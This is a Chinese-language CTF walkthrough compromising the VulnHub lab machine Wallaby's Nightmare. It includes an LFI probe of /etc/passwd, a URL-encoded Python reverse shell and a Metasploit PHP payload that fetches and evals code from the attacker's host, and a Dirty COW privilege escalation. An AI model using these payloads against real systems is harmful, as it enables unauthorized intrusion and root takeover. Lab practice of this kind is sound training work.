vulnhub靶场,WALLABY’S: NIGHTMARE (V1.0.2)
环境准备
靶机下载地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/
攻击机:kali(192.168.109.128)
靶机:WALLABY’S: NIGHTMARE (V1.0.2)(192.168.109.187)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
信息收集
使用arp-scan确定目标靶机
确定目标靶机IP为192.168.109.187
使用nmap扫描查看目标靶机端口开放情况
开放端口:22、80
浏览器访问目标靶机80端口
这里要你输入一个姓名去打这次CTF
点击Start the CTF!
这里说什么我在渗透他的服务器,并且在监视我,查看这个url发现可能存在LFI
http://192.168.109.187/?page=../.././../etc/passwd
确实存在LFI,但是尝试包含日志文件失败,漏洞不能得到有效利用
使用nikto进行扫描
nikto -host http://192.168.109.187/
没有发现什么,当时发现再次访问上面那个链接竟然显示网站不存在了
what?
再次使用nmap进行扫描
可以看到目标关闭了80端口,而在60080端口开启了http服务
使用浏览器访问目标靶机的60080端口
这里说为了防止我攻击,换了另一个港口,说明之前的?page页面应该还在,访问试试
对?page页面进行目录扫描
发现mailer页面
查看源代码
发现这里存在RCE,进行验证
http://192.168.109.187:60080/?page=mailer&mail=ls
渗透过程
这里可以使用python进行反弹shell
kali:nc -lvvp 4444
目标靶机:http://192.168.109.187:60080/?page=mailer&mail=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.109.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
这里也可以使用另一种方法
use exploit/multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.109.128
set lport 8888
exploit
目标靶机上
http://192.168.109.187:60080/?page=mailer&mail=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.109.128:8080/taXS3RI6xGsLgOY%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22
提权
查看目标靶机信息
这里可以使用脏牛提权
将exp下载到本地
wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c
进行编译
gcc cowroot.c -o exp -pthread
给予执行权限
chmod +x exp
运行exp进行提权
切换至其root目录,成功获得flag,靶机vulnhub靶场,WALLABY’S: NIGHTMARE (V1.0.2)渗透结束